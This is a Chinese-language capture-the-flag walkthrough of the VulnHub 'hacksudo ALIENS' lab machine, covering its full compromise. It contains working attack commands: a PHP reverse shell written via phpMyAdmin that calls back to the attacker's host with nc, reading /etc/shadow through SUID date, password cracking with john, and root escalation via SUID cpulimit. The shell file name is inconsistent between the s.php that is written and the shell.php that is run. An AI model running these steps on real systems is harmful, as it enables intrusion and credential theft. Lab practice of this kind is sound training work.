靶机练习 aliens phpmyadmin拿shell date命令提权
靶机信息下载地址:https://www.vulnhub.com/entry/hacksudo-aliens,676/名称:hacksudo系列ALIENS靶场:VulnHub.com难度:简单发布时间:2021年4月4日提示信息:无目标:user.txt和root.txt实验环境攻击机:VMwarekali192.168.7.3靶机:VboxlinuxIP自动获取信息收集扫描主机扫描局域网内的靶

靶机信息
下载地址:
https://www.vulnhub.com/entry/hacksudo-aliens,676/
名称: hacksudo系列ALIENS
靶场: VulnHub.com
难度: 简单
发布时间: 2021年4月4日
提示信息: 无
目标: user.txt和root.txt
实验环境
攻击机:VMware kali 192.168.7.3
靶机:Vbox linux IP自动获取
信息收集
扫描主机
扫描局域网内的靶机IP地址
sudo nmap -sP 192.168.7.1/24

扫描到靶机地址为192.168.7.122
端口扫描
端口扫描是扫描目标机器所开放的服务
sudo nmap -sC -sV -p- 192.168.7.122 -oN aliens.nmap

扫描到3个开放的端口22(SSH),80(HTTP)和9000(HTTP),先从80开始入手
Web渗透
访问80
http://192.168.7.122

是一个目击外星人数据的网站,未发现敏感信息,做个目录扫描
目录扫描
dirsearch -u http://192.168.7.122 -e php,html,txt,zip -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

扫描到2个目录,看看backup这个目录下面有什么

发现一个mysql备份文件,下载下来看看
wget http://192.168.7.122/backup/mysql.bak
cat mysql.bak

发现数据库帐号和密码
user=vishal
password=hacksudo
没有其他可利用的信息了,再来看看9000端口
http://192.168.7.122:9000

原来是phpMyAdmin(mysql数据库管理工具),用刚才获取到的帐号密码登录试试

phpMyAdmin写入shell
登录成功,试试有没有写权限,我们直接写个反弹shell的脚本
select "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.7.3 4444 >/tmp/f');?>" into outfile "/var/www/html/s.php"


写入成功,验证一下
反弹shell
kali攻击机监听4444端口
nc -lvvp 4444

web上执行payload
http://192.168.7.122/shell.php

反弹成功,切换完整的交互shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xter
Ctrl+z

stty -a

stty raw -echo;fg
reset

stty rows 20 columns 82

切换完成,干正事,查找一切可利用的敏感信息
/var/backups目录下发现4个root权限的备份文件,但是没有权限查看,继续找

find / -perm -u=s -type f 2>/dev/null

发现个/usr/bin/date有s权限,我们可以利用这个命令读取文件
/usr/bin/date -f /etc/shadow

发现两个帐号有密码,把他们保存到kali攻击机上
vi passwd.txt

还需要处理一下格式,将前面多余的内容,和最后的单引号去掉

处理好了,现在开始暴破密码
john passwd.txt

拿到hacksudo帐号的密码aliens,登录ssh
ssh hacksudo@192.168.7.122

登录成功,找找可利用的敏感信息
/home/hacksudo/Desktop目录下找到user.txt
cd /home/hacksudo/Desktop
ls
cat user.txt

cpulimit提权
/home/hacksudo/Desktop目录下发现cpulimit文件有s权限
cd /home/hacksudo/Download
ls -al

这个程序是可以提权的
./cpulimit -l 100 -f -- /bin/sh -p

提权成功,查看最后一个flag
cd /root
ls -al
cat root.txt

OK,拿到root.txt,游戏结束

更多推荐



所有评论(0)